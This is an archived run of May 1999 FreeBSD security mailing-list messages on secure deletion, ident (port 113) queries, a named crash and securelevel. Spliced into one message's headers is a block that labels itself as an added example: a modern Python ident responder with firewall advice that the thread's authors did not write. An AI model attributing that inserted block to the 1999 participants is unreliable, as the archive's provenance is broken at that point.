>http://www.newsroom.co.nz/

From owner-freebsd-security Fri May 21 01:33:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns0.virtual-pc.com (mailgate.virtual-pc.com [194.217.102.1]) by hub.freebsd.org (Postfix) with ESMTP id 6249914D61 for ; Fri, 21 May 1999 01:33:48 -0700 (PDT) (envelope-from gc@virtual-pc.com)
Received: from virtual-pc.com (v-pc.virtual-pc.com [195.11.18.2]) by ns0.virtual-pc.com (8.9.3/8.8.5) with ESMTP id JAA22600; Fri, 21 May 1999 09:39:46 +0100 (BST)
Message-ID: <374519D4.403016C2@virtual-pc.com>
Date: Fri, 21 May 1999 09:31:16 +0100
From: gc
X-Mailer: Mozilla 4.5 [en] (Win95; I)
X-Accept-Language: en
MIME-Version: 1.0
To: tim@iafrica.com.na
Cc: Joel Maslak , security@FreeBSD.ORG
Subject: Re: Secure Deletion
References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> <374474D4.2263@iafrica.com.na>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Tim Priebe wrote:
> 
> Joel Maslak wrote:
> > 
> > Let's keep standard BSD semantics here, please!
> > 
> > As for "secure" deletion... Why doesn't someone just write a simple
> > user-space program to do that. True, it wouldn't handle calls to unlink(),
> > but one would think that someone could modify the library really quick
> > (provided no one does a system call directly, but uses the libc interface
> > instead). I think this would be much better for everyone involved.
> > 
> > Some problems with my idea...
> > 
> > Static-linked executables would need to be recompiled
> > Library would need to be modified on "secure" systems
> > 
> > If all you want is a way to force a file to go away from the command line,
> > just rewrite rm.

Could someone enlighten me as to why the first move is not to write back
an inverted copy of the data to even out the residual field before
resorting to other patterns? (this assumes you are deleting a file and
thus still have the data before you start).

> From my understanding of ffs, this would not be sufficient. As a file
> grows, it is possible that the data is copied from its initial location
> to a new one. To not just give a false sense of security these block
> fragments would have to be overwritten after the data is copied, or
> some of the data could still be sitting on the drive after you think it
> is gone.

In that case, maybe there should be a flag attached to a given file which
made the OS 'securely' wipe any sectors that had been used by the file
any time it moved them.

gc

> Tim.
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:38:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id E681D15954 for ; Fri, 21 May 1999 01:38:40 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id SAA45432; Fri, 21 May 1999 18:39:05 +1000 (EST) (envelope-from akm) 
From: Andrew Kenneth Milton Message-Id: <199905210839.SAA45432@mail.theinternet.com.au> Subject: Re: Server trying to connect to Port 113 In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> from Greg Quinlan at "May 21, 1999 9:31:37 am" To: greg@qmpgmc.ac.uk Date: Fri, 21 May 1999 18:39:05 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Greg Quinlan ]--------------------------------------------- | I am not on the mailing list so please include me in your reply. | | Can someone explain what this remote system is trying to do? | | May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 :113 in via fxp1 | May 21 09:22:35 amanda last message repeated 3 times | | Extract from /etc/services | | auth 113/tcp ident tap #Authentication Service | auth 113/udp ident tap #Authentication Service | | Greg Authenticate a user. -- ala identd or pidentd. Given a socket port on both ends, identd returns the username that is connected to that socket. This is used most commonly by IRC servers, but is also used by web-proxies. 
-- 
Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew
The Internet (Aust) Pty Ltd          | F:+61 7 3870 4477 | Milton
ACN: 082 081 472                     | M:+61 416 022 411 |72 Col .Sig
PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|Specialist

From owner-freebsd-security Fri May 21 1:39:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id 1271B15958 for ; Fri, 21 May 1999 01:39:26 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca)
Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id FAA24439; Fri, 21 May 1999 05:38:04 -0300 (ADT)
Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id FAA01717; Fri, 21 May 1999 05:38:01 -0300 (ADT)
Date: Fri, 21 May 1999 05:38:01 -0300 (ADT)
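Added example for the ident (auth, port 113) exchange discussed in the replies above; this is not code from any message in the thread. It is a minimal RFC 1413 request parser and responder in Python, with the round trip simulated against a constructed connection table. The peer address 192.0.2.10, the ports 4321 and 25, the querying port 1937 from Greg's log and the user name "greg" are assumptions for illustration.

```python
"""Minimal RFC 1413 (ident/auth, TCP port 113) request/response logic.

Added example, not code from the freebsd-security thread. The remote
host, its address 192.0.2.10, the ports and the user name are constructed.
"""
import re

# Ident error types defined by RFC 1413.
INVALID_PORT = "INVALID-PORT"
NO_USER = "NO-USER"
HIDDEN_USER = "HIDDEN-USER"

# A request is "<port-on-server> , <port-on-client>" where "server" is the
# host answering on 113 (Greg's "amanda") and "client" is the host asking.
_REQUEST = re.compile(r"^\s*(\d{1,5})\s*,\s*(\d{1,5})\s*$")

# Constructed stand-in for what identd reads from the kernel's TCP table:
# (local port, peer address, peer port) -> owning user. Here "greg" on
# amanda has an outbound SMTP session to 192.0.2.10:25 from local port 4321.
CONN_TABLE = {
    (4321, "192.0.2.10", 25): "greg",
}


def parse_request(line: str):
    """Return (server_port, client_port) or None for a malformed request."""
    m = _REQUEST.match(line.rstrip("\r\n"))
    if m is None:
        return None
    sport, cport = int(m.group(1)), int(m.group(2))
    if not (1 <= sport <= 65535 and 1 <= cport <= 65535):
        return None          # RFC 1413: ports must be in 1..65535
    return sport, cport


def respond(line: str, peer_ip: str, table=CONN_TABLE, hide_users: bool = False) -> str:
    """Build the identd reply line (CRLF-terminated) for one request.

    peer_ip is the source address of the TCP connection carrying the query;
    the request itself names only ports, which is why identd can only ever
    answer about connections between this host and the host that asked.
    """
    ports = parse_request(line)
    if ports is None:
        return f"0 , 0 : ERROR : {INVALID_PORT}\r\n"
    sport, cport = ports
    user = table.get((sport, peer_ip, cport))
    if user is None:
        return f"{sport} , {cport} : ERROR : {NO_USER}\r\n"
    if hide_users:
        # What a privacy-conscious identd sends: confirms the connection
        # exists without leaking the account name.
        return f"{sport} , {cport} : ERROR : {HIDDEN_USER}\r\n"
    return f"{sport} , {cport} : USERID : UNIX : {user}\r\n"


def exchange(query: str, hide_users: bool = False):
    """Simulate the round trip behind Greg's ipfw log, both sides' lines.

    192.0.2.10 (sendmail, tcp_wrappers, an IRC server...) connects to
    amanda:113 from its port 1937 and asks which user owns amanda's end of
    the 4321 <-> 25 session. Returns (request_line, response_line).
    """
    request = query.strip() + "\r\n"
    response = respond(request, peer_ip="192.0.2.10", hide_users=hide_users)
    return request, response


if __name__ == "__main__":
    for q in ("4321, 25", "9999, 25", "0, 25", "not a request"):
        req, resp = exchange(q)
        print(f"-> {req.strip()!r}\n<- {resp.strip()!r}")
    print("<-", exchange("4321, 25", hide_users=True)[1].strip())
```

In Greg's log the remote host is the one asking: something on amanda connected to it first (mail, IRC, a proxy), and its server opened the reverse connection to amanda:113 before accepting the session. Running no identd at all is the usual choice, because a truthful reply hands local account names to anyone who connects. The practical cost of a silent ipfw `deny` is that the remote sendmail or IRC server sits in its ident timeout first; an ipfw `reset` rule for port 113, which answers with a TCP RST, lets those connections set up faster while still revealing nothing.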
From: Michael Richards <026809r@dragon.acadiau.ca>
X-Sender: 026809r@dragon
To: Greg Quinlan
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Server trying to connect to Port 113
In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 21 May 1999, Greg Quinlan wrote:
> Can someone explain what this remote system is trying to do?
> 
> May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 :113 in via fxp1
> May 21 09:22:35 amanda last message repeated 3 times

Quite possibly, the remote machine is running tcp wrappers or some other
such thing and it's causing it to try an ident query when a connection is
made. Something like that. For more info, log the packets. You'd probably
find that they are normal "ident" packets...

-Michael

From owner-freebsd-security Fri May 21 1:42: 7 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 6034715956 for ; Fri, 21 May 1999 01:42:04 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com)
Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id BAA13721; Fri, 21 May 1999 01:39:32 -0700 (PDT)
Message-ID: <19990521013932.A13233@best.com>
Date: Fri, 21 May 1999 01:39:32 -0700
From: "Jan B. Koum "
To: Greg Quinlan , freebsd-security@FreeBSD.ORG
Subject: Re: Server trying to connect to Port 113
References: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>; from Greg Quinlan on Fri, May 21, 1999 at 09:31:37AM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 21, 1999 at 09:31:37AM +0100, Greg Quinlan wrote:
> I am not on the mailing list so please include me in your reply.
> 
> Can someone explain what this remote system is trying to do?
> 
> May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 :113 in via fxp1
> May 21 09:22:35 amanda last message repeated 3 times
> 
> Extract from /etc/services
> 
> auth 113/tcp ident tap #Authentication Service
> auth 113/udp ident tap #Authentication Service
> 
> Greg

Might be sendmail going back into your box to get ident info. Or this
might be provoked by something else - like tcp wrappers, irc, etc, etc...

-- Yan

From owner-freebsd-security Fri May 21 1:44:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rucus.ru.ac.za (rucus.ru.ac.za [146.231.29.2]) by hub.freebsd.org (Postfix) with SMTP id 0B4CE15959 for ; Fri, 21 May 1999 01:44:09 -0700 (PDT) (envelope-from nbm@rucus.ru.ac.za)
Received: (qmail 54340 invoked by uid 1003); 21 May 1999 08:44:51 -0000
Date: Fri, 21 May 1999 10:44:51 +0200
From: Neil Blakey-Milner To: Greg Quinlan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 Message-ID: <19990521104451.A53814@rucus.ru.ac.za> References: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>; from Greg Quinlan on Fri, May 21, 1999 at 09:31:37AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri 1999-05-21 (09:31), Greg Quinlan wrote: > I am not on the mailing list so please include me in your reply. > > Can someone explain what this remote system is trying to do? > > May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 ip>:113 in via fxp1 > May 21 09:22:35 amanda last message repeated 3 times > > Extract from /etc/services > > auth 113/tcp ident tap #Authentication Service > auth 113/udp ident tap #Authentication Service It's trying to work out who's doing something to them. Things like IRC, squid, mail, news, and other services sometimes want to know which user on a system is doing things to it. It can usually be ignored. Neil -- Neil Blakey-Milner nbm@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 3:39:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from web114.yahoomail.com (web114.yahoomail.com [205.180.60.86]) by hub.freebsd.org (Postfix) with SMTP id 6F93215196 for ; Fri, 21 May 1999 03:39:39 -0700 (PDT) (envelope-from holtor@yahoo.com) Message-ID: <19990521104344.22917.rocketmail@web114.yahoomail.com> Received: from [209.191.62.241] by web114.yahoomail.com; Fri, 21 May 1999 03:43:44 PDT Date: Fri, 21 May 1999 03:43:44 -0700 (PDT) 
From: Holtor
Subject: named 8.1.2 crash
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello, checking through my /var/log/messages this morning, I've seen something I've never seen before.

May 20 23:52:19 greg named[83548]: /usr/src/usr.sbin/named/../../contrib/bind/bin/named/ns_main.c:491: INSIST(evGetNext(ev, &event, EV_WAIT) != -1): Invalid argument failed.
May 20 23:52:30 greg /kernel: pid 83548 (named), uid 53: exited on signal 6
May 20 23:52:19 greg named[83548]: /usr/src/usr.sbin/named/../../contrib/bind/bin/named/ns_main.c:491: INSIST(evGetNext(ev, &event, EV_WAIT) != -1): Invalid argument failed.

I'm running named 8.1.2, I restarted it and it works okay now, but what caused all that?

Thanks,
Holt

_____________________________________________________________
Do You Yahoo!?
Free instant messaging and more at http://messenger.yahoo.com

From owner-freebsd-security Fri May 21 5:13:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id D35361527F; Fri, 21 May 1999 05:13:15 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id OAA24582; Fri, 21 May 1999 14:13:14 +0200 (CEST)
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id OAA85626; Fri, 21 May 1999 14:13:09 +0200 (MET DST)
Date: Fri, 21 May 1999 14:13:09 +0200
From: Eivind Eklund To: CONDOR Cc: chat@FreeBSD.org Subject: Re: secure deletion Message-ID: <19990521141308.A85583@bitbox.follo.net> References: <01BEA2F3.8E3149A0.condor@inreach.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <01BEA2F3.8E3149A0.condor@inreach.com>; from CONDOR on Thu, May 20, 1999 at 06:51:19PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Moving to -chat]. On Thu, May 20, 1999 at 06:51:19PM -0700, CONDOR wrote: > -----Original Message----- > From: Avalon Books [SMTP:avalon@advicom.net] > Sent: Thursday, May 20, 1999 12:52 > To: Dan Langille > Cc: Darren Reed; freebsd-security@FreeBSD.ORG > Subject: Re: secure deletion > > > It seems a bit extreme, but I will admit it *is* a secure erase > method. That's military thinking for you... > > [CONDOR] I saw a good 'government approved CD eraser' at a convention one time. > > -A guy had two heat warped CDs in a toaster.. You want to run them through a microwave oven first. This will break the recording material (not the plastic) into approx 1 inch long areas, using a neat pattern of lightning to do it (I'm not kidding). No prize but passing your physics class if you can say why it goes to approx an inch long pieces, and all the effects then stop. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 5:16:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 033F91527F for ; Fri, 21 May 1999 05:16:40 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id PAA10889; Fri, 21 May 1999 15:16:30 +0300 (EEST) Date: Fri, 21 May 1999 15:16:30 +0300 (EEST) 
From: Narvi
To: Bart Smit
Cc: Kiril Mitev , freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 21 May 1999, Bart Smit wrote:
> On Thu, 20 May 1999, Kiril Mitev wrote:
> 
> > -> then you (theoretically) should be worried about locking up your
> > hardware, rather than wiping your disk :-0
> 
> Actually it's easier and a lot safer to wipe your disk. It's perfectly
> feasible that the law shows up on your doorstep and insists on taking
> your hardware if you're an ISP. It takes as little as some determination
> from a pseudo-religious sect's lawyers (ask xs4all.nl).

Or it might be your laptop, that shouldn't reveal any unnecessary
information and be secure against grep.

> 
> -- 
> Bart
> 

Sander

There is no love, no good, no happiness and no future -
all these are just illusions.

From owner-freebsd-security Fri May 21 5:53:39 1999
Delivered-To: freebsd-security@freebsd.org
Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 1C80A1531A for ; Fri, 21 May 1999 05:53:36 -0700 (PDT) (envelope-from adam@weathership.homeport.org)
Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA01189; Fri, 21 May 1999 09:09:02 -0400 (EDT)
Date: Fri, 21 May 1999 09:09:02 -0400
From: Adam Shostack
To: gc
Cc: security@FreeBSD.ORG
Subject: Re: Secure Deletion
Message-ID: <19990521090901.A1155@weathership.homeport.org>
References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> <374474D4.2263@iafrica.com.na> <374519D4.403016C2@virtual-pc.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <374519D4.403016C2@virtual-pc.com>; from gc on Fri, May 21, 1999 at 09:31:16AM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 21, 1999 at 09:31:16AM +0100, gc wrote:
| Could someone enlighten me as to why the first move is not to write back
| an inverted copy of the data to even out the residual field before
| resorting to other patterns? (this assumes you are deleting a file and
| thus still have the data before you start).

You mean other than the fact that it doesn't work? :)

See Gutmann's paper in Usenix Security 96:
http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
                                               -Hume

From owner-freebsd-security Fri May 21 8:55:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 543A115ABF for ; Fri, 21 May 1999 08:55:17 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA23107; Fri, 21 May 1999 11:55:10 -0400 (EDT) (envelope-from wollman)
Date: Fri, 21 May 1999 11:55:10 -0400 (EDT)
From: Garrett Wollman Message-Id: <199905211555.LAA23107@khavrinen.lcs.mit.edu> To: wkt@cs.adfa.edu.au Cc: security@FreeBSD.ORG Subject: Lowering securelevel from console? In-Reply-To: <199905210635.QAA10497@henry.cs.adfa.edu.au> References: <199905210635.QAA10497@henry.cs.adfa.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Now, are there any other reasons why lowering securelevel as root from > the console (and no net connectivity) would be a BAD thing? A rogue root process could use the debugger to take control of another process (e.g., getty) and force it to disengage security. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 9:47:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 60BA915014 for ; Fri, 21 May 1999 09:47:09 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA79928; Fri, 21 May 1999 18:46:44 +0200 (CEST) (envelope-from des) To: "Ilmar S. Habibulin" Cc: James Wyatt , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: 
From: Dag-Erling Smorgrav Date: 21 May 1999 18:46:44 +0200 In-Reply-To: "Ilmar S. Habibulin"'s message of "Thu, 20 May 1999 23:40:42 +0400 (MSD)" Message-ID: Lines: 8 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Ilmar S. Habibulin" writes: > My thoughts are about an option in kernel config file (WIPEINFO?) A mount option would be better. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 9:50: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 6A82114DD3 for ; Fri, 21 May 1999 09:50:01 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA79941; Fri, 21 May 1999 18:49:51 +0200 (CEST) (envelope-from des) To: "Patrick Bihan-Faou" Cc: Darren Reed , Gregory Sutter , wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: <19990520145800.B5E31150AF@hub.freebsd.org> 
From: Dag-Erling Smorgrav Date: 21 May 1999 18:49:51 +0200 In-Reply-To: "Patrick Bihan-Faou"'s message of "Thu, 20 May 1999 10:57:52 -0400" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Patrick Bihan-Faou" writes: > I agree with that last statement. An implementation on FreeBSD probably does > not need to write multiple times to the disk. Wouldn't work, anyway, unless you disable write caching (not just on the disk, but in the disk driver as well - no soft updates!). Otherwise, all passes but the last will be ignored, unless you wipe a really big file (too big to fit in cache). DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 10: 0: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0B76C159E8 for ; Fri, 21 May 1999 10:00:00 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA79962; Fri, 21 May 1999 18:59:32 +0200 (CEST) (envelope-from des) To: gc Cc: tim@iafrica.com.na, Joel Maslak , security@FreeBSD.ORG Subject: Re: Secure Deletion References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> <374474D4.2263@iafrica.com.na> <374519D4.403016C2@virtual-pc.com> 
From: Dag-Erling Smorgrav Date: 21 May 1999 18:59:32 +0200 In-Reply-To: gc's message of "Fri, 21 May 1999 09:31:16 +0100" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org gc writes: > Could someone enlighten me as to why the first move is not to write back > an inverted copy of the data to even out the residual field before > resorting to other patterns? (this assumes you are deleting a file and > thus still have the data before you start). Because an inverted copy is encoded (almost) exactly like the original copy. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 10:28:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 31F6514E67 for ; Fri, 21 May 1999 10:28:37 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id VAA18530; Fri, 21 May 1999 21:28:35 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id VAA10557; Fri, 21 May 1999 21:28:34 +0400 (MSD) Date: Fri, 21 May 1999 21:28:34 +0400 (MSD) 
From: "Ilmar S. Habibulin"
To: Dag-Erling Smorgrav
Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 21 May 1999, Dag-Erling Smorgrav wrote:
> > My thoughts are about an option in kernel config file (WIPEINFO?)
> A mount option would be better.

Why a mount option? Secure deletion is a feature of the fs and impacts
files on this fs. All of them. So why use a mount option?

From owner-freebsd-security Fri May 21 10:53: 6 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 8EE5115111 for ; Fri, 21 May 1999 10:53:04 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id TAA80088; Fri, 21 May 1999 19:52:57 +0200 (CEST) (envelope-from des)
To: "Ilmar S. Habibulin"
Cc: Dag-Erling Smorgrav , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
References:
From: Dag-Erling Smorgrav Date: 21 May 1999 19:52:56 +0200 In-Reply-To: "Ilmar S. Habibulin"'s message of "Fri, 21 May 1999 21:28:34 +0400 (MSD)" Message-ID: Lines: 16 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Ilmar S. Habibulin" writes: > On 21 May 1999, Dag-Erling Smorgrav wrote: > > > My thoughts are about an option in kernel config file (WIPEINFO?) > > A mount option would be better. > Why mount option? Secure deletion is a feature of fs and impacts files of > this on this fs. All of them. So why use mount option? Because a mount option can be changed at runtime, whereas a kernel option cannot. A mount option would allow you to enable the security feature on file systems which need it but not on file systems which do not need it, whereas a kernel option would enable it unconditionally on all file systems. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 11: 4:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from orion.ac.hmc.edu (Orion.AC.HMC.Edu [134.173.32.20]) by hub.freebsd.org (Postfix) with ESMTP id 6A61215111 for ; Fri, 21 May 1999 11:04:55 -0700 (PDT) (envelope-from brooks@one-eyed-alien.net) Received: from localhost (brdavis@localhost) by orion.ac.hmc.edu (8.8.8/8.8.8) with ESMTP id LAA11905; Fri, 21 May 1999 11:04:25 -0700 (PDT) 
From: brooks@one-eyed-alien.net
X-Authentication-Warning: orion.ac.hmc.edu: brdavis owned process doing -bs
Date: Fri, 21 May 1999 11:04:25 -0700 (PDT)
X-Sender: brdavis@orion.ac.hmc.edu
To: Dag-Erling Smorgrav
Cc: "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 21 May 1999, Dag-Erling Smorgrav wrote:
> "Ilmar S. Habibulin" writes:
> > Why mount option? Secure deletion is a feature of fs and impacts files of
> > this on this fs. All of them. So why use mount option?
> 
> Because a mount option can be changed at runtime, whereas a kernel
> option cannot. A mount option would allow you to enable the security
> feature on file systems which need it but not on file systems which do
> not need it, whereas a kernel option would enable it unconditionally
> on all file systems.

I'd definitely agree that it should be done on an FS by FS basis, but it
seems that a tunefs flag like softupdates might be more appropriate. My
reason for this is simply that if you forget to enable the option once and
do any write operations to speak of, you will need to completely wipe the
entire FS to ensure you actually destroy the old data. Making it a tunefs
option would mean that you couldn't forget.

-- Brooks

From owner-freebsd-security Fri May 21 11:10:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bogon.kjsl.com (bogon.kjsl.com [205.179.23.2]) by hub.freebsd.org (Postfix) with ESMTP id 32C4715111 for ; Fri, 21 May 1999 11:10:16 -0700 (PDT) (envelope-from javier@bogon.kjsl.com)
Received: (from javier@localhost) by bogon.kjsl.com (8.9.3/8.9.3) id LAA25276; Fri, 21 May 1999 11:10:09 -0700 (PDT)
